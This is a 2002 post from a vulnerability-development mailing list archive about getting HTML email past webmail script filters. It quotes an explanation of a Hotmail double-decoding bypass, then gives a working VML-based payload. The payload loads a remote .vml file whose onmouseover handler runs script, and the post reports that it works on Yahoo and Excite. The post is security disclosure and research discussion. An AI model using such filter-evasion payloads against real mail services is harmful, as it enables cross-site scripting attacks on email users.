Vulnerability Development mailing list archives
Re: double decoding filter bypass (Hotmail) + challenge for you
From: "http-equiv () excite com" <http-equiv () malware com>
Date: Wed, 17 Jul 2002 23:16:35 -0000
<!-- So what about Hotmail ? Well, where can we put unicode in an html message ? Into an url as %xx, yep, but that's not the point here. There is a thing called "html entities" : you can replace *any* printable character by its ascii/unicode value in the values of the parameters of html tags, for instance in the parameters of the STYLE tag (hint !). "A" is A, "B" is B, etc.
What the hotmail filter did is replacing any html entity by its
corresponding character, then trying to filter out any bad string (forbidden keywords), THEN giving the output to the user, without re- applying the filter on this output. But, if there are still html entities into this output, the user's browser will interpret them, that will possibly give birth to some interesting forbidden keywords... and fire a script.--> Excellent. Here's another one for you FozZY: <HTML xmlns:v = "urn:schemas-microsoft-com:vml"> <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE> <v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.malware.com/fooness.vml#malware"></v:vmlframe> where fooness.vml#malware is: <xml xmlns:v = "urn:schemas-microsoft-com:vml"> <v:rect id="malware" fillcolor="green" style="position:relative;top:1;left:1;width:20;height:20" onmouseover="alert('malware was here')"> </v:rect> </xml> 1. This works on Yahoo and Excite, probably others 2. Quick fiddling suggests only mouseover works 3. Hotmail only filters this: <HTML xmlns:v = "urn:schemas-microsoft-com:vml"> <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE> which is absolutely required. Probably easier to mask than say "Javascript" note 1/: can't recall, Hotmail may not allow for retrieval of files remotely, or base64 encodes them on the Hotmail server if there are any. If so, you can embed and CID: the fooness.vml note /2: the above may also work in IE dependent mail clients (Eudora..?..) note /3: doesn't want to work in Outlook Express with scripting off even though the frame aspect works - which is patched in OE6 -- http://www.malware.com
Current thread:
- double decoding filter bypass (Hotmail) + challenge for you FozZy (Jul 15)
- <Possible follow-ups>
- Re: double decoding filter bypass (Hotmail) + challenge for you http-equiv () excite com (Jul 17)